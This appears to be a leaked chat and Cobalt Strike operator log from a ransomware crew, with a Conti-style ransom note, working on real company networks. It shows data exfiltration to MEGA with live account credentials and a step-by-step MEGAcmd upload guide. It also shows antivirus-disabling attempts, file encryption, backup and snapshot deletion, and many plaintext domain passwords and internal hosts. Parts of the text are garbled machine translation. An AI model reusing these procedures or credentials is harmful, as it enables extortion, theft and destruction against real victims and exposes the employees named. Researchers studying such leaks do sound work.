    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

``And the host is called something else and I don't think it's a group without a domain.
nimble-group1.waterway.com
nimble...did you check the hostname? 2 years ago it was the same but we tried to check harper's access or you mean rdcheck my mail? if harper's online should i check it but i don't know if it's192.168.0.If he's not online, should he check on his desktop? I think he has notes on the desktop where he may have access ... screenshot of the desktop ... in processes only if he does not have a dropbox hanging in his browser
SauronEye.exe -d C: D: G: Q: -c 192.168.0.43 -f .* -s
``okay later let's have a look, I think the sauron setting is wrong, don't find it, check it in DJ too ``
	 === SauronEye ===

Directories to search: C:, D:, G:, Q:, password, nimble, pwd
For file types: .*
Containing:
Search contents: True
Search Office 2003 files for VBA: False
Max file size: 1024 KB
Search Program Files directories: True
Searching in parallel: C:
Searching in parallel: G:
Searching in parallel: D:
Searching in parallel: Q:
Searching in parallel: password
Searching in parallel: nimble
Searching in parallel: pwd
[*] Done searching file system, now searching contents
[*] Done searching file system, now searching contents

 Done. Time elapsed = 00:00:00.0388757

have you tried sauron? have you downloaded it?
beacon> shell start /b MEGAcmdServer.exe
[*] Tasked beacon to run: start /b MEGAcmdServer.exe
[+] host called home, sent: 57 bytes
```
```
beacon> shell MEGAclient.exe update --auto=off
[*] Tasked beacon to run: MEGAclient.exe update --auto=off
[+] host called home, sent: 63 bytes
[+] received output:
 -------------------------------------------------------------------------------
| ENABLING AUTOUPDATE BY DEFAULT. You can disable it with "update --auto=off" |
 -------------------------------------------------------------------------------
Automatic updates disabled
```
```
beacon> shell MEGAclient.exe login jyszkivtedxvrqbbit@upived.online teguiQWERmjsd
[*] Tasked beacon to run: MEGAclient.exe login jyszkivtedxvrqbbit@upived.online teguiQWERmjsd
[+] host called home, sent: 98 bytes
[+] received output:
 ---------------------------<Terms of Service Update>---------------------------
| Our revised Terms of Service, Privacy and Data Policy, and Takedown Guidance |
| Policy apply from January 18th 2021 |
| View Terms: https://mega.nz/updatedterms |
| Execute "psa --discard" to stop seeing this message |
 -------------------------------------------------------------------------------
```
```
beacon> shell MEGAclient.exe whoami
[*] Tasked beacon to run: MEGAclient.exe whoami
[+] host called home, sent: 52 bytes
[+] received output:
Account e-mail: jyszkivtedxvrqbbit@upived.online
```
```
beacon> shell MEGAclient.exe put -q --ignore-quota-warn "C:\Users\Djarden\Documents\Outlook Files\ol.7z"
[*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn "C:\Users\Djarden\Documents\Outlook Files\ol.7z"
[+] host called home, sent: 121 bytes
``Well, that's how it turns out that the computer's been lagging so badly!``
```
3) Start background MEGAcmdServer.exe
```
it turns out:
```
shell start /b MEGAcmdServer.exe
```
and go
Or I just do conditionally
```
shell MEGAclient.exe login ....
```
and it's ok? why?
1) Create folder for files
2) Uploads exe and dll files to created folder
``Read the guide files and it will take 2 gb, about 20 min.
MegaNZ usage

1) Create folder for files
2) Uploads exe and dll files to created folder
3) Start background MEGAcmdServer.exe
4) Use the commands:
> MEGAclient.exe update --auto=off # disable autoupdate for megacmd
> MEGAclient.exe login login password # init session by creds
> MEGAclient.exe # check connection
> MEGAclient.exe put -q --ignore-quota-warn test.txt # upload file to acc storage [-q background process]
> MEGAclient.exe ls # check remote directory
> MEGAclient.exe logout # end session
> MEGAclient.exe quit # kill MEGAcmdServer.exe
5) Remove special folder for MEGAcmd.
6) Remove update task from schtasks:
> schtasks /query /FO list | findstr /i "mega"
> SCHTASKS /TN "\mega\ FULL NAME HERE" /DELETE /F



example:

> MEGAclient.exe update --auto=off
Automatic updates disabled
> MEGAclient.exe login supertest@mail.test P@$$w0rd

> MEGAclient.exe whoami
Account e-mail: supertest@mail.test
> MEGAclient.exe put -q --ignore-quota-warn C:\temp\test.txt

> MEGAclient.exe ls
test.txt
> MEGAclient.exe logout
Logging out...
> MEGAclient.exe quit

> schtasks /query /FO list | findstr /i "mega"
Folder: \MEGA
TaskName:      \MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000
> SCHTASKS /TN "\MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000" /DELETE /F
``Console mega client''.
WW99NAS - Synology DiskStation - Mozilla Firefox
=======
[backspace]Ui0wyarwy08!Watray0n08
```ggZxzf8Z1rhnIzswMo86-Q so and so кудаjyszkivtedxvrqbbit@upived.online
teguiQWERmjsd to anonymous disposable mailchat through torregej ak heremeganz2 gba further tell me how to do it faster to start in the archive):zany_face:so what to 7zip and see you tomorrow?
[-] screenshot from desktop 1 is empty
``I mean the screenshot``

 Directory of C:\Users\Djarden\Desktop

01/02/2021 10:07 AM <DIR> .
01/02/2021 10:07 AM <DIR> .
07/23/2019 08:05 AM 9,780,208 05 loyalty log on 07.23.2019 cargo not working.txt
02/04/2019 02:23 PM 1,097 1 Everything you need.xlsx - Shortcut.lnk
02/12/2019 01:55 PM 2,153 2018FirewallReview .xlsx - Shortcut.lnk
08/29/2019 09:03 PM 59,664 2019 Import into PDI.xlsx
10/16/2019 03:46 PM 2,368 2019 Wash and Membership Price Changes.xlsx - Shortcut.lnk
07/22/2019 07:39 AM 0 60bainbridge.txt
08/22/2020 01:15 PM 1,049,521 Base CCC Discounts.xlsx
01/31/2019 09:10 PM 1,104 Calls.xlsx - Shortcut.lnk
01/30/2018 08:58 AM 1,075 ccc - Shortcut.lnk
01/10/2020 09:59 AM 11,573 Copy of Declined Card Log for 31.xlsx
06/05/2019 10:22 AM 400 Daily Processing.appref-ms
04/20/2017 03:09 PM <DIR> DBF files
11/04/2019 02:09 PM 0 DRB times.txt
01/09/2019 12:53 PM 1,303 Dropbox.lnk
06/01/2016 12:29 PM 22,528 Email on Phone Instructions.doc
06/27/2019 10:12 PM 1,517 Examples of spam.txt
10/24/2019 01:56 PM <DIR> Express_ENU
03/07/2019 09:02 AM 573 Fast Pass Lookup.sql
01/24/2019 09:51 AM 2,466 GitHub Desktop.lnk
09/10/2019 10:46 AM 11,233,441 HHSupport_20190910_1144.zip
07/19/2019 02:15 PM 54 I auditor.txt
11/23/2020 09:15 AM 9,175,040 Intranet.mdb
01/11/2019 12:21 PM <DIR> ipad crap
11/27/2018 04:16 PM 632 IT - Shortcut.lnk
06/19/2019 03:32 PM 516 Kingshighway email.txt
08/09/2019 12:11 PM 57,300 KingshighwayLoyalty.xlsx
01/06/2020 11:26 AM <DIR> Logs from #61
01/06/2020 11:27 AM 4,703 Logs from #61.zip
12/11/2019 12:25 PM 10 logs.txt
07/22/2019 07:46 AM 1,271,961 Loyalty log 5 after loyalty code change.txt
10/24/2019 09:34 AM <DIR> Lty Database #22
06/02/2018 08:06 AM 701 Marketing Folder.lnk
09/16/2019 08:34 AM 1,324 MarketingPLUs .xlsx - Shortcut (2).lnk
04/03/2020 08:28 AM 1,295 Microsoft SQL Server Management Studio 18.lnk
01/30/2018 12:12 PM <DIR> Mobile Device Center Windows 10 1709 Fix
02/06/2019 05:19 PM 775 My F Drive Folder.lnk
09/20/2019 01:42 PM 16,734 NATHAN MARY.docx
01/06/2020 10:43 AM <DIR> New folder
06/18/2019 12:03 PM <DIR> Notes to portal
12/03/2019 09:00 AM 2,435 OneNote 2016.lnk
02/07/2018 11:11 AM 4,089 Phone & Internet Providers.xls - Shortcut.lnk
08/11/2020 09:39 AM <DIR> Printer
06/19/2019 10:11 AM <DIR> Program Data Zip
12/24/2020 11:55 AM 87,778 Program Data Zip (2).zip
08/24/2017 02:50 PM 4,064 Program License.lnk
01/31/2017 02:40 PM 1,215 Remote Desktop Connection.lnk
01/22/2020 10:48 AM 2,359 RemoteDesktopManagerFree.lnk
01/06/2020 10:48 AM 2,236 RingCentral Meetings.lnk
09/19/2019 02:44 PM 1,361 Safety Tablets and Iauditor Info.lnk
01/02/2021 10:07 AM 2,250 Slack.lnk
07/14/2018 12:53 PM 1,342 Spotify.lnk
10/20/2019 05:13 PM 2,141 SQL Edits.xlsx - Shortcut.lnk
05/07/2018 03:27 PM 1,134 System Scheduler.lnk
12/11/2019 03:33 PM <DIR> Tickets
02/19/2020 11:14 AM 906 Transfer Look up.sql
07/18/2019 04:07 PM 9,471,921 Unit 05 Loyalty Log issues with Cargo Charges.txt
11/13/2019 12:51 PM 18,459 Unit 31 11/12/2019.xlsx
01/06/2020 10:44 AM 770,963 Unit 61 files 01062020.zip
02/07/2019 01:11 PM 2,390 Upgrading internet service providers.xlsx - Shortcut.lnk
02/12/2019 01:56 PM 19,879 waterway 2-11.xlsx
04/22/2019 11:57 AM 17,690 waterway 4-22.xlsx
05/15/2019 10:18 AM 17,953 waterway 5-9.xlsx
01/30/2018 11:47 AM 2,435 Windows Mobile Device Center.lnk
07/24/2018 12:40 PM 3,486 wwsql ccc KingshighwayLoyalty.odc

he doesn't have any notes on his desktop by any chance? DJARDEN maybe it's there maybe we can get his backup correspondence they must have access within the car he probably deleted all the way there's no fucking thing or on the cars maybe he can find something on nimble try it maybe sauron can look it up?it's a slack, i'm for me, where's it from and where? ok, i'll check his history, he also has info on nimbleDJARDEN\c$\Users\DjardenDo you know where to click x to win? try him, i don't) `DESSINGAUDY\administrator DressinGaudy4` have you tried him?

 PID PPID Name Arch Session User
 --- ---- ---- ---- ------- ----
 0 0 [System Process]
 4 0 System x64 0 NT AUTHORITY\SYSTEM
 2320 4 smss.exe x64 0 NT AUTHORITY\SYSTEM
 1532 10816 HostedAgent.exe x86 0 NT AUTHORITY\SYSTEM
 1988 1532 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 7364 1532 logWriter.exe x86 0 NT AUTHORITY\SYSTEM
 12808 7364 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 2444 2436 csrss.exe x64 0 NT AUTHORITY\SYSTEM
 2520 2512 csrss.exe x64 1 NT AUTHORITY\SYSTEM
 2528 2436 wininit.exe x64 0 NT AUTHORITY\SYSTEM
 2656 2528 services.exe x64 0 NT AUTHORITY\SYSTEM
 2416 2656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 2992 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5264 2992 WmiPrvSE.exe x64 0 NT AUTHORITY/\NETWORK SERVICE
 8920 2992 rundll32.exe x64 1 DRESSINGAUDY\Administrator
 13528 2992 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM
 27592 2992 WmiPrvSE.exe x86 0 NT AUTHORITY\NETWORK SERVICE
 38536 2992 ApplicationFrameHost.exe x64 1 DRESSINGAUDY\Administrator
 3052 2656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 3216 2656 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 3224 2656 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 3364 2656 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 3436 2656 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 3644 2656 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 4364 2656 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 4608 2656 svchost.exe x64 0 NT AUTHORITY/UNETWORK SERVICE
 5012 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5180 2656 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM
 5268 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5336 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5372 2656 BaCBTStatusTracking.exe x86 0 NT AUTHORITY\SYSTEM
 5380 2656 BackupExtender.exe x86 0 NT AUTHORITY\SYSTEM
 5404 2656 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM
 5416 2656 LMIGuardianSvc.exe x64 0 NT AUTHORITY\SYSTEM
 5436 2656 snmp.exe x64 0 NT AUTHORITY\SYSTEM
 5444 2656 ramaint.exe x64 0 NT AUTHORITY\SYSTEM
 5480 2656 QBIDPService.exe x86 0 NT AUTHORITY\SYSTEM
 5512 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 34252 5512 w3wp.exe x64 0 IIS APPPOOL\DefaultAppPool
 5520 2656 dns.exe x64 0 NT AUTHORITY\SYSTEM
 5536 2656 dsm_sa_eventmgr64.exe x64 0 NT AUTHORITY\SYSTEM
 5560 2656 dsm_sa_datamgr64.exe x64 0 NT AUTHORITY\SYSTEM
 5568 2656 QBCFMonitorService.exe x86 0 NT AUTHORITY\SYSTEM
 5576 2656 ScreenConnect.ClientService.exe x86 0 NT AUTHORITY\SYSTEM
 4936 5576 ScreenConnect.WindowsClient.exe x64 1 DRESSINGAUDY\Administrator
 11660 5576 ScreenConnect.WindowsClient.exe x64 1 NT AUTHORITY\SYSTEM
 5600 2656 sqlbrowser.exe x86 0 NT AUTHORITY\LOCAL SERVICE
 5608 2656 sqlwriter.exe x64 0 NT AUTHORITY\SYSTEM
 5620 2656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 5732 2656 SSUService.exe x86 0 NT AUTHORITY\SYSTEM
 5740 2656 ismserv.exe x64 0 NT AUTHORITY\SYSTEM
 5832 2656 QBDBMgrN.exe x86 0 NT AUTHORITY\SYSTEM
 5848 2656 atashost.exe x86 0 NT AUTHORITY\SYSTEM
 5864 2656 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM
 7680 2656 vds.exe x64 0 NT AUTHORITY\SYSTEM
 7784 2656 TmListen.exe x64 0 NT AUTHORITY\SYSTEM
 12008 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 13712 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 16748 13712 dasHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 13808 2656 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 13916 2656 svcGenericHost.exe x86 0 NT AUTHORITY\NETWORK SERVICE
 14124 2656 Intuit.QBDT.Webconnector.QBWCMonitor.exe x86 0 NT AUTHORITY\SYSTEM
 13968 14124 Intuit.QBDT.Webconnector.Application.exe x86 1 DRESSINGAUDY\Administrator
 14496 2656 TmCCSF.exe x64 0 NT AUTHORITY\SYSTEM
 15348 2656 Ntrtscan.exe x64 0 NT AUTHORITY\SYSTEM
 16340 2656 LogMeIn.exe x64 0 NT AUTHORITY\SYSTEM
 19640 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2672 2528 lsass.exe x64 0 NT AUTHORITY\SYSTEM
 2580 2512 winlogon.exe x64 1 NT AUTHORITY\SYSTEM
 3124 2580 dwm.exe x64 1 Window Manager\DWM-1
 36984 2580 fontdrvhost.exe x64 1 DRESSINGAUDY\Administrator
 41508 2580 mstsc.exe x86 1 NT AUTHORITY\SYSTEM
 45152 2580 mstsc.exe x86 1 NT AUTHORITY\SYSTEM
 45596 2580 mstsc.exe x86 1 NT AUTHORITY\SYSTEM
 2932 3484 sihost.exe x64 1 DRESSINGAUDY\Administrator
 3848 15192 PccNtMon.exe x64 1 DRESSINGAUDY\Administrator
 4376 5632 explorer.exe x64 1 DRESSINGAUDY\Administrator
 14284 12980 QBWebConnector.exe x86 1 DRESSINGAUDY\Administrator
``what processes are active? and not from the lada? get your lan dk up there, there's an admin av
i turned on the rdp, now let me in, but does not let me into the wind - an error, something with the procylem Where can you not go? ``https://www.bleepingcomputer.com/forums/t/617257/ransomnotecleaner-remove-ransom-notes-left-behind/``Give me a session/agent-deactivate-start-stop.html
```
Pinging accounting2.DressinGaudy.local [172.16.1.247] with 32 bytes of data:
Reply from 172.16.1.15: Destination host unreachable.
``Trendmicro is scrambling the note? You have to turn it off anyway.``
 the text is scrambling
it's deleting it.
this can be fixed, but av will still block the build itself
Did you throw dasox from a different place on the dk?
====== AntiVirus ======

  Engine : Trend Micro Security Agent
  ProductEXE : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\Pccntmon.exe
  ReportingEXE : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\tmwscsvc.exe

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

  Engine : Trend Micro Security Agent
  ProductEXE : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\Pccntmon.exe
  ReportingEXE : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\tmwscsvc.exe

``fuck... can't kill the avi process like this get up there just trendmicro? ahahvs still deletednu process poleliv through kmd can't kill the avi process? let's make a vid and spread out why on dk? can't go to dk if on dk can't get to dk how?in any case, drop av with the message deleted padlazalizatelno zależali rdmi with the content of "123" hane, hand threw and it disappeared unscramble av and vindefotivno not sure that encrypt everything> it starts and go av in the process blockchitsya bastards will remove the download and zależy file 123 in readme.txt here i copied where tajip riddmi asked to download what file? leave through echo)
beacon> shell echo 1 > C:\readme.txt
[*] Tasked beacon to run: echo 1 > C:\readme.txt
[+] host called home, sent: 53 bytes
beacon> shell dir C:\readme.txt
[*] Tasked beacon to run: dir C:\readme.txt
[+] host called home, sent: 48 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is CC70-3A4E

 Directory of C:\

01/19/2021 05:07 PM 4 readme.txt
               1 File(s) 4 bytes
               0 Dir(s) 541,679,837,184 bytes free

beacon> shell type C:\readme.txt
[*] Tasked beacon to run: type C:\readme.txt
[+] host called home, sent: 49 bytes
[+] received output:
1

``I throw it in the root and it disappears<kznm
beacon> upload /home/wevvewe/Desktop/readme.txt
[*] Tasked beacon to upload /home/wevvewe/Desktop/readme.txt as readme.txt
[+] host called home, sent: 932 bytes
beacon> shell dir readme.txt
[*] Tasked beacon to run: dir readme.txt
[+] host called home, sent: 45 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is CC70-3A4E

 Directory of C:\

File Not Found

beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\
``echo 1 > C:\readme.\ exactly there?
beacon> upload /home/wevvewe/Desktop/readme.txt
[*] Tasked beacon to upload /home/wevvewe/Desktop/readme.txt as readme.txt
[+] host called home, sent: 932 bytes
beacon> shell dir readme.txt
[*] Tasked beacon to run: dir readme.txt
[+] host called home, sent: 45 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is CC70-3A4E

 Directory of C:\

File Not Found

``I don't know if it's correct and don't know if everything just put in C:\ put in the same 5 pk yes, by hand everything encrypts, only the file doesn't appear by hand * by hand put in DC don't know how long will it be? -Trend and other things have turned off everything? -And in others? Here lies accounting2930b fil 01/19/2021 16:52:06 readme.txt
beacon> ls C:\
[*] Tasked beacon to list files in C:\
[+] host called home, sent: 20 bytes
[*] Listing: C:\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 04/24/2014 10:17:32 $AVG
          dir 05/05/2014 14:50:25 $Recycle.Bin
          dir 01/13/2021 00:36:32 $WinREAgent
          dir 03/11/2014 14:27:30 _FedEx
          dir 04/12/2013 16:26:21 BIN
          dir 06/13/2015 09:33:14 bootdrv
          dir 06/13/2015 09:33:13 CMCLanDesk
          dir 01/15/2021 17:30:47 Config.Msi
          dir 12/01/2020 12:12:25 CounterPoint SQL Tutorials
          dir 01/19/2021 10:17:28 PM CPAccounting
          dir 04/03/2013 14:41:34 dell
          dir 07/14/2009 00:08:56 Documents and Settings
          dir 03/10/2014 13:00:44 Drivers
          dir 01/24/2018 11:46:42 HP_Color_LaserJet_Pro_MFP_M477
          dir 02/28/2014 15:46:04 HP_ePrint
          dir 10/07/2013 16:59:18 HP_ePrint_Mobile
          dir 03/04/2014 10:55:01 HP_LJ300-400_color_MFP_M375-M475
          dir 10/07/2013 16:53:39 HP_LJM425_scan_upgrade_11_1
          dir 07/23/2020 22:10:48 inetpub
          dir 06/23/2016 08:37:33 Intel
          dir 04/27/2016 01:35:59 Logs
          dir 02/28/2018 10:34:09:09 MATS
          dir 12/07/2019 03:14:52:52 PerfLogs
          dir 07/23/2020 22:38:46 Program Files
          dir 09/10/2020 11:54:42 Program Files (x86)
          dir 07/24/2020 09:52:37 ProgramData
          dir 07/23/2020 20:07:22 Recovery
          dir 03/26/2013 05:21:53 System Recovery
          dir 01/18/2021 19:16:12 System Volume Information
          dir 02/28/2014 15:06:33 Temp
          dir 07/23/2020 19:44:04 Users
          dir 01/13/2021 01:04:40 Windows
          dir 10/04/2016 11:30:40 WindowsUpdates Batch files
 1kb fil 01/19/2021 16:52:06 .rnd.WSFWM
 535b fil 01/19/2021 16:52:06 BOOTNXT.WSFWM
 28kb fil 01/18/2021 16:52:06 dell.sdr.WSFWM
 8kb fil 01/18/2021 09:15:14 DumpStack.log.tmp
 0b fil 06/21/2013 12:57:16
 6mb fil 04/12/2013 16:27:45 FSMMSILog.txt
 5gb fil 01/18/2021 09:15:12 hiberfil.sys
 476kb fil 01/05/2002 03:40:20 msvcp70.dll
 336kb fil 01/05/2002 03:37:28 msvcr70.dll
 8gb fil 01/18/2021 09:15:14 pagefile.sys
 930b fil 01/19/2021 16:52:06 readme.txt
 256mb fil 01/18/2021 09:15:14 swapfile.sys
 1kb fil 01/16/2015 12:21:09 tcg quaterly run.txt

beacon> shell dir C:\readme.txt
[*] Tasked beacon to run: dir C:\readme.txt
[+] host called home, sent: 48 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is B825-1C82

 Directory of C:\

01/19/2021 04:52 PM 930 readme.txt
               1 File(s) 930 bytes
               0 Dir(s) 842,931,138,560 bytes free

beacon> shell type C:\readme.txt
[*] Tasked beacon to run: type C:\readme.txt
[+] host called home, sent: 49 bytes
[+] received output:
All of your files are currently encrypted.
Backups were encrypted or deleted, same as Shadow Copies.

If you try to use any additional recovery software - the files might be damaged, but if you are still willing to try - try it on the data of the lowest value.

To make sure that we REALLY CAN recover all of the encrypted data - we offer you to decrypt 2 random files of your choice completely free of charge.

The faster you reply - the easier and cheaper it will be.
To receive information on the price of the recovery software you can contact our team directly for further instructions through our website:

TOR VERSION :
(you should download and install TOR browser first https://torproject.org)

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

HTTPS VERSION :
https://contirecovery.best

---BEGIN ID---
TZhuHwa9cdqOe3RnHObcHHHJFFVZUjBpwFXziFQud63TrrrLqJ3ikFUXJn1BfjYF
---END ID---


``We have to cut off the av and restart it.
DressinGaudy\canton GMC041985
DressinGaudy\corporate GCouture
DressinGaudy\DG108 Gaudy081
DressinGaudy\jmr 1515sasy
DressinGaudy\ROOK RR#2212
DressinGaudy\DG102 Gaudy021
DressinGaudy\GM103 Gaudy031
DressinGaudy\tim true0407
DressinGaudy\DG105 Gaudy051
DressinGaudy\GCPOS8A-TGM1 Password1
DressinGaudy\GM106 Gaudy061
DressinGaudy\GCPOS5A-LGM3 register
``Disconnect the micro)`` Yes, I already pulled[ ](https://mediaeveryone.com/group/gaudyme-com?msg=6biKzY5QiYNKbKihb) try to unshare the c$``.
172.16.1.247:7680
172.16.1.247:6783
172.16.1.247:5357
172.16.1.247:5040
172.16.1.247:2107
172.16.1.247:2105
172.16.1.247:2103
172.16.1.247:1801
172.16.1.247:139
172.16.1.247:135
172.16.1.247:80
172.16.1.247:445 (platform: 500 version: 10.0 name: ACCOUNTING2 domain: DRESSINGAUDY)
``Trend Micro Inc. should be shut down for an av[ ](https://mediaeveryone.com/group/gaudyme-com?msg=MtM65JGes69QGu2ov) ``what av? if another process won't jump into c$-but they were dropping out after 10-15 seconds-sessions, so I'm pulling wmic - rpc server is unavailable
do remote-exec psexec - everything okily you about psex?[ ](https://mediaeveryone.com/group/gaudyme-com?msg=q83XW27j2ohmjkmLC) ??? and rpc open? it works psex? strange that rpc does not work ``
Teemo[GAUDY-DC2]SYSTEM */2580|2021Jan20 01:33:12> shell net view \\172.16.1.247 /all
[*] Tasked beacon to run: net view \\172.16.1.247 /all
[+] host called home, sent: 59 bytes
[+] received output:
Shared resources at \172.16.1.247



Share name Type Used as Comment

-------------------------------------------------------------------------------
IPC$ IPC Remote IPC
print$ Disk Printer Drivers
The command completed successfully.

``rpc doesn't work at all rpc on the first one works?``
Accounting2.DressinGaudy.local: 172.16.1.247 on disk access says no name found
Label.DressinGaudy.local: 172.16.1.61 is
DGW-PC.DressinGaudy.local: 172.16.1.83 is
Gaudy-DC2.DressinGaudy.local: 169.254.32.72 is
GAUDY-RDP1.DressinGaudy.local: 172.16.1.15 is the same computer as above
Gaudy-DC2.DressinGaudy.local: 169.254.113.11 is the same computer as the above two
Gaudy-DC2.DressinGaudy.local: 169.254.196.198 is the same computer as the three above
Gaudy-DC2.DressinGaudy.local: 172.16.1.15 is the same computer as the four above
GM-Tyler-Office.DressinGaudy.local: 192.168.1.103 is
MikaDesktop.DressinGaudy.local: 192.168.2.149 is
``And there were 7(5) how many total pc's?
[*] Listing: C:\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 01/19/2021 16:18:48 $GetCurrent
          dir 11/02/2020 15:50:17 $Recycle.Bin
          dir 01/19/2021 16:18:49 $SysReset
          dir 01/19/2021 16:18:49 $WinREAgent
          dir 01/19/2021 16:18:52 _FedEx
          dir 01/19/2021 16:18:49 AMD
          dir 01/19/2021 16:18:49 ATI
          dir 01/19/2021 16:18:49 DG
          dir 07/14/2009 00:08:56 Documents and Settings
          dir 01/19/2021 16:18:50 ESD
          dir 01/19/20/2021 16:18:50 FedEx
          dir 01/19/2021 16:18:50 Logs
          dir 01/19/20/2021 16:18:50 MSOCache
          dir 01/19/2021 16:18:51 New Pics
          dir 12/07/2019 03:14:52 PerfLogs
          dir 01/19/2021 16:18:51 Program Files
          dir 01/19/2021 16:18:51 Program Files (x86)
          dir 01/19/2021 16:18:51 ProgramData
          dir 01/19/20/2021 16:18:51 Recovery
          dir 01/19/20/2021 16:18:44 System Volume Information
          dir 02/02/2015 15:03:13 temp
          dir 01/19/2021 16:18:52 Users
          dir 01/19/2021 14:41:20 Windows
          dir 12/06/2019 09:34:02 Windows10Upgrade
 1kb fil 01/19/2021 16:18:48 .rnd.WSFWM
 535b fil 01/19/2021 16:18:48 BOOTNXT.WSFWM
 947kb fil 01/19/2021 16:18:48 count_log_out.txt.WSFWM
 8kb fil 01/13/2021 02:10:14 DumpStack.log.tmp
 7mb fil 01/19/2021 16:18:48 FSMMSILog.txt.WSFWM
 11gb fil 01/13/2021 02:10:10 hiberfil.sys
 883kb fil 12/01/2006 22:37:14 msdia80.dll
 15gb fil 01/13/2021 02:10:14 pagefile.sys
 1kb fil 01/19/2021 16:18:48 SOCIAL-MEDIIA1.txt.WSFWM
 34b fil 09/26/2016 11:55:16 Start Windows Updates.bat
 32b fil 09/26/2016 11:54:46 Stop Windows Updates.bat
 256mb fil 01/13/2021 02:10:14 swapfile.sys
``Leaving the files encrypted, why does he not leave a note more? Are we ok? There are no disks as if there is no account, but the hostnames are all there, I pinged all the rest? All 5 machines are pulled, all ready?
Accounting2.DressinGaudy.local: 172.16.1.247
Label.DressinGaudy.local: 172.16.1.61
DGW-PC.DressinGaudy.local: 172.16.1.83
Gaudy-DC2.DressinGaudy.local: 169.254.32.72
GAUDY-RDP1.DressinGaudy.local: 172.16.1.15
Gaudy-DC2.DressinGaudy.local: 169.254.113.11
Gaudy-DC2.DressinGaudy.local: 169.254.196.198
Gaudy-DC2.DressinGaudy.local: 172.16.1.15
GM-Tyler-Office.DressinGaudy.local: 192.168.1.103
MikaDesktop.DressinGaudy.local: 192.168.2.149

Is everything ready? 1TB - delete in 5 minutes. My screenshot above is exactly all there is, delete snaps, etc. Read all what is there and so what is complete? Still do completely) files that are in 2013-2015terabyte drive and default login password. it is doubtful that something good was there.
QNAP Turbo NAS
http://172.16.1.14:8080/cgi-bin/
admin
admin
QNAP Turbo NAS only find us, there is one server and half of the company, I think the files will not collect, here under 0 can you close? I think all hereuser9user4@tl1 Give everyone here) avsix.com nothing pulls there some nonsense ``
172.16.1.10
172.16.1.15
172.16.1.74
172.16.1.55
172.16.1.244
172.16.1.71
172.16.1.248
172.16.1.75
172.16.1.248
172.16.1.76
172.16.1.242
192.168.1.103
172.16.1.247
172.16.1.85
172.16.1.75
172.16.1.61
172.16.1.62
192.168.2.149
172.16.1.83
172.16.1.78
172.16.1.71
``user7 should be @user7
@user3 is busy here with @user3 let's go to random whatever you want to help? > on all of them yes sniper gave
>[-] Invoke_3 on EntryPoint failed.then reserch admins)or uzakili adminroot there's a passthrough there passvot clears yes by the way
```
DressinGaudy\canton GMC041985
DressinGaudy\corporate GCouture
DressinGaudy\DG108 Gaudy081
DressinGaudy\jmr 1515sasy
DressinGaudy\ROOK RR#2212
DressinGaudy\DG102 Gaudy021
DressinGaudy\GM103 Gaudy031
DressinGaudy\tim true0407
DressinGaudy\DG105 Gaudy051
DressinGaudy\GCPOS8A-TGM1 Password1
DressinGaudy\GM106 Gaudy061
DressinGaudy\GCPOS5A-LGM3 register
DressinGaudy\GCPOS4A-LGM2 register
DressinGaudy\GCPOS3A-LGM1 register
DressinGaudy\GCPOS17A-LDG1 register
DressinGaudy\GCPOS18A-LDG2 register
DressinGaudy\GCPOS10A-TGM3 register
DressinGaudy\GCPOS11A-CDG1 register
DressinGaudy\GCPOS12A-CDG2 register
DressinGaudy\GCPOS13A-CDG3 register
DressinGaudy\GCPOS1A-TDG1 register
DressinGaudy\GCPOS2A-TDG2 register
DressinGaudy\GCPOS6A-TXDG1 register
DressinGaudy\GCPOS7A-TXDG2 register
DressinGaudy\GCPOS9A-TGM2 register
DressinGaudy\GCPOS9A-TGM2 register
```
[-] Invoke_3 on EntryPoint failed.
``````
192.168.2.164 - did not open
172.16.1.11 - avaya, telephony
172.16.1.20 - canon iR-ADV C2225i
172.16.1.22 - HP LaserJet M402n
172.16.1.58 - HP OfficeJet Pro 8710

172.16.1.14 - us, qnap
``There's a hell of a lot of trouble,``
```
172.16.1.58:443
